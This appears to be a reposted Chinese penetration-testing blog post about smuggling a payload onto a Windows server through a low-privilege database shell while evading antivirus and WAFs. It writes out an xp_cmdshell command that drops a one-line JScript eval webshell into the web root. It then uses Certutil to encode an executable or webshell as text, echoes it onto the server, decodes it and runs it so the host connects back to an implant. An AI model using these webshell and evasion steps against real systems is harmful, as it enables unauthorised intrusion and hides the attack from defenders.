文件上传的一个骚操作(低权限+bypassAV)
2022-8-14 00:1:43 Author: 橘猫学安全(查看原文) 阅读量:36 收藏

文章来源:FreeBuf(耳旁的歌)

原文地址:

https://www.freebuf.com/articles/network/259671.html

0x01 前言

各位在渗透中是否遇见过这个问题:

虽然有低权限命令shell,如mssql、postgres等,执行下载总是各种无权限或者被AV杀,轻则无法继续渗透,重则弹出拦截消息,管理员上机后立马发现。

本文将介绍一种使用windows自带工具进行编码,写入编码数据到TXT文本最后再解码的骚操作。

0x02 正文

不多说,例如这样场景:在数据库连接后或者sqlmap注入连接os-shell后可执行命令。

其中包括杀软或某狗、某盾

此时下载文件的各种命令均被拦截

bitsadmin

certutil证书:

还会被杀软报警

powershell也会被彻底封杀

尤其是某管家,拦截更彻底,根本没有倒计时自动消失(此时需要夸一下某大厂的报警提示倒计时功能)

而在这种环境下可在有权限写入的前提下尝试写入一句话木马

xp_cmdshell 'echo  ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["bmfx"], "unsafe");%^>> D:\\WWW\\bmfx.aspx'

但也存在被某狗、WAF杀掉的可能,此时,骚操作上场

windows自带的证书下载,也就是上文使用但远程下载被拦截的Certutil,还可用来对文件编码解码

本地:Certutil -encode artifact.exe artifact.txt
或指定路径:Certutil -encode d:\artifact.exe d:\artifact.txt

将txt文本使用echo命令

echo sfAFASFAsfasgasdf………>>d:\1.txt

写入服务器后,进入txt所在目录执行解码(或直接指定物理目录文件)

Certutil -decode art.txt art.exe或:Certutil -decode d:\art.txt d:\art.exe

后续可在命令中执行exe上线

cmd.exe /c art.exe

重点是:本地解码编码操作不会触发杀软拦截行为!

此外,Certutil支持将任意文件编码解码,除了exe还有aspx、php、jsp等(如加密免杀的webshell,此处使用哥斯拉为例)

可在web站点写入文件后访问txt查看写入有无偏差

还有一点,本人亲测,编码后txt中的文本类似于生成的shellcode,会自动换行显示,但本地替换换行符、自行拆分换行符,不改变内容的前提下,编码、解码前后的文件不会有任何影响。

但是在navicat等数据库软件里操作的话还有一个限制,echo的长度会提示不要过长


此时就要看各位师傅们在bypass WaF、AV时如何减小体量了,一般cs的马bypass后会在50k左右,使用sqlmap的—os-shell执行echo不会像navicat要求128字符那么短,但也有长度限制,具体各位可亲测。

推荐阅读

实战|记一次奇妙的文件上传getshell

「 超详细 | 分享 」手把手教你如何进行内网渗透

神兵利器 | siusiu-渗透工具管理套件

一款功能全面的XSS扫描器

实战 | 一次利用哥斯拉马绕过宝塔waf

BurpCrypto: 万能网站密码爆破测试工具

快速筛选真实IP并整理为C段 -- 棱眼

自动探测端口顺便爆破工具t14m4t

渗透工具|无状态子域名爆破工具(1秒扫160万个子域)

查看更多精彩内容,还请关注橘猫学安全:

每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“再看


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247496391&idx=1&sn=069949bfc482dddef467efa7f8e5e248&chksm=c04d75f9f73afcef0214a39ee35a2c621450360ff4b883598c8a784583c8654419be00bba624#rd
如有侵权请联系:admin#unsafe.sh